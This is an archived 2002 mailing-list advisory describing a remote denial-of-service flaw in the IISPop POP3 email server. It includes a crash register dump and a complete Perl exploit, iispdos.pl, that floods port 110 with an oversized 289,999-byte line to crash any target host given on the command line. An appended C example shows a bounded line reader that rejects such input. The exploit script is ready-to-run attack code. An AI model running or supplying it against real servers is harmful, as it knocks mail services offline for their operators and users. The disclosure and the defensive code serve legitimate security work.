IISPop remote DOS

From: securma massine (securmaat_private)
Date: Fri Nov 15 2002 - 12:11:02 PST


    hi
    
    The IISPop EMail Server (http://www.curtiscomp.com/) was 
    designed for small networks. This is a POP3-only server, 
    designed to be paired with the SMTP server bundled in 
    Windows 2000/IIS 5.
     
    I have found that IISPop is vulnerable to a DoS attack 
    caused by sending a large buffer (289999 bytes); this attack 
    gives the following state of the registers (tested on v 
    1.161 and 1.181):
    
    Access violation - code c0000005 (first chance)
    eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae esi=0040693d edi=00437181
    eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
    KERNEL32!GetCurrentThreadId+4:
    77e76941 0000             add     [eax],al                ds:0023:00000041=??
    
    (unhandled exception in IISPop.exe (KERNEL32.DLL) 
    0xc0000005: access violation)
    
    exploit:
    #!/usr/bin/perl -w
    # tool : iispdos.pl 
    # shuts down all versions of IISPop
    # greetz crack.fr , marocit ,christal
    #
    # Connects to the POP3 port (110) of the target, sends one
    # 289999-byte line of 'A' without waiting for the banner,
    # and disconnects.
     
    use strict;
    use IO::Socket;
    
    if (@ARGV != 1) {
        print "\n-->";
        print "\tUsage: perl iispdos.pl <host>\n";
        exit;
    }
    
    my $remo   = $ARGV[0]; 
    my $buffer = "A" x 289999;    # oversized request line that crashes IISPop
    
    print "\n-->";
    print "\tconnection with $remo\n";
    my $so = IO::Socket::INET->new(Proto    => "tcp",
                                   PeerAddr => $remo,
                                   PeerPort => "110");
    unless ($so) {
        print "-->";
        print "\tConnection Failed...\n";
        exit;
    }
    print $so "$buffer\n";
    close $so;
    
    print "-->";
    print "\tnow test if the distant host is down\n";
    exit;
    
    
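An added example, not code from the original post and not IISPop's own source (which is not on this page): a POP3 command reader that bounds every line at the RFC 2449 limit of 255 octets (including CRLF) before it is stored, so a single oversized line such as the 289999-byte one sent by iispdos.pl gets an error reply and a disconnect instead of being copied into a fixed buffer. The struct and function names, the sample login exchange and the chunk sizes are assumptions of the example, chosen to mimic bytes arriving from a socket.

```c
/* Added example: bounded POP3 line reading. Names and sizes are the
 * example's own assumptions; RFC 2449 is the source of the 255-octet limit. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define POP3_MAX_LINE 255   /* RFC 2449: a command is at most 255 octets incl. CRLF */

enum line_status { LINE_OK, LINE_INCOMPLETE, LINE_TOO_LONG };

/* Look for one complete line in the first n bytes of buf, never scanning past
 * POP3_MAX_LINE bytes. On LINE_OK the line (CRLF stripped, NUL-terminated) is
 * copied into out and *consumed says how many input bytes it used. */
enum line_status pop3_read_line(const unsigned char *buf, size_t n,
                                char *out, size_t outsz, size_t *consumed)
{
    size_t limit = n < POP3_MAX_LINE ? n : POP3_MAX_LINE;
    for (size_t i = 0; i < limit; i++) {
        if (buf[i] != '\n')
            continue;
        size_t len = i;
        if (len > 0 && buf[len - 1] == '\r')
            len--;
        if (len >= outsz)              /* guard; cannot trigger when outsz > POP3_MAX_LINE */
            return LINE_TOO_LONG;
        memcpy(out, buf, len);
        out[len] = '\0';
        *consumed = i + 1;
        return LINE_OK;
    }
    /* No terminator within the first POP3_MAX_LINE bytes: the line is already
     * overlong, and nothing the peer sends later can make it valid. */
    return n >= POP3_MAX_LINE ? LINE_TOO_LONG : LINE_INCOMPLETE;
}

/* Per-connection state. The receive buffer holds exactly one maximal line,
 * so a client can never make the server store more than that. */
struct conn {
    unsigned char rb[POP3_MAX_LINE];
    size_t used;
    int lines_ok;   /* well-formed commands seen; dispatch would go here */
    int closed;     /* set once the connection has been dropped */
};

/* Deliver freshly received bytes to the connection. */
void conn_feed(struct conn *c, const unsigned char *data, size_t n)
{
    while (n > 0 && !c->closed) {
        size_t room = sizeof c->rb - c->used;   /* > 0: a full buffer is always resolved below */
        size_t take = n < room ? n : room;
        memcpy(c->rb + c->used, data, take);
        c->used += take; data += take; n -= take;
        for (;;) {
            char line[POP3_MAX_LINE + 1];
            size_t consumed = 0;
            enum line_status st = pop3_read_line(c->rb, c->used, line, sizeof line, &consumed);
            if (st == LINE_TOO_LONG) {   /* a real server writes "-ERR line too long\r\n" first */
                c->closed = 1;
                break;
            }
            if (st == LINE_INCOMPLETE)
                break;
            c->lines_ok++;
            memmove(c->rb, c->rb + consumed, c->used - consumed);
            c->used -= consumed;
        }
    }
}

/* Run a whole client byte stream through a fresh connection in chunk-sized pieces. */
struct conn simulate_session(const unsigned char *stream, size_t total, size_t chunk)
{
    struct conn c;
    memset(&c, 0, sizeof c);
    for (size_t off = 0; off < total && !c.closed; off += chunk) {
        size_t n = total - off < chunk ? total - off : chunk;
        conn_feed(&c, stream + off, n);
    }
    return c;
}

/* Constructed sample: an ordinary POP3 login exchange (three commands). */
struct conn demo_normal_session(size_t chunk)
{
    static const unsigned char s[] = "USER bob\r\nPASS hunter2\r\nQUIT\r\n";
    return simulate_session(s, sizeof s - 1, chunk);
}

/* Constructed sample reproducing iispdos.pl: 289999 'A' bytes followed by "\n". */
struct conn demo_iispdos_payload(size_t chunk)
{
    size_t len = 289999 + 1;
    unsigned char *p = malloc(len);
    if (!p) exit(1);
    memset(p, 'A', len - 1);
    p[len - 1] = '\n';
    struct conn c = simulate_session(p, len, chunk);
    free(p);
    return c;
}

/* Status of a single line made of n_as 'A' characters plus CRLF. */
enum line_status check_synthetic_line(size_t n_as)
{
    unsigned char *p = malloc(n_as + 2);
    char out[POP3_MAX_LINE + 1];
    size_t consumed = 0;
    if (!p) exit(1);
    memset(p, 'A', n_as);
    p[n_as] = '\r';
    p[n_as + 1] = '\n';
    enum line_status st = pop3_read_line(p, n_as + 2, out, sizeof out, &consumed);
    free(p);
    return st;
}

int main(void)
{
    struct conn ok = demo_normal_session(7);
    struct conn bad = demo_iispdos_payload(1460);
    printf("normal session: %d commands, closed=%d\n", ok.lines_ok, ok.closed);
    printf("iispdos payload: %d commands, closed=%d\n", bad.lines_ok, bad.closed);
    return 0;
}
```

The point of the capped receive buffer is that the decision is made after at most 255 bytes, before the remaining 289 KB of the payload is ever read into memory; the same reader also copes with a line split across several TCP segments, which is why the simulation delivers the stream in chunks.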
    



    This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 12:11:03 PST